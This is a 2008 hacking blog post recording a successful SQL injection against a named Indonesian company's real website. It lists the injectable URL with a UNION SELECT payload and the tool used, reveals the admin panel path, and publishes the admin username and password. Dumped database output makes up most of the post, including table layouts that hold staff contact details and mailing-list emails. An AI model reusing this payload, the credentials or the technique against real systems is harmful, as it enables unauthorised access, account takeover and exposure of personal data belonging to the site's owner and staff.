viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, October 13, 2008

[SQLi] http://inixindojogja.com/

1:50 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://inixindojogja.com/admin/
Admin usr:pwd --> webadmin:webj0gja2006
Dump:
[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 21:40:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jmn1928_inixindo
User: jmn1928_mydb@localhost
Version: 5.0.51a-community

[Database]: jmn1928_inixindo
[Table: Columns]
[0]admin: username,password
[1]berita: noberita,tglberita,judul,kategori,headline,isiberita,gambar,pengirim
[2]berita_eng: noberita,tglberita,judul,kategori,headline,isiberita,gambar,pengirim
[3]bukutamu: nmr,nama,url,komentar,status,tglkirim
[4]counter: jmlkunjungan
[5]jadwal: id,bulan,training,bulan_eng
[6]mailist: nourut,email
[7]staff: id,jabatan,nama,email,handphone,hobbies,foto,cv,cv_eng

[-] [21:41:35]
[-] Total URL Requests 42
[-] Done


[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 21:42:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jmn1928_inixindo
User: jmn1928_mydb@localhost
Version: 5.0.51a-community
[+] Dumping data from database "jmn1928_inixindo" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] webadmin:webj0gja2006:webj0gja2006:

[-] [21:42:18]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment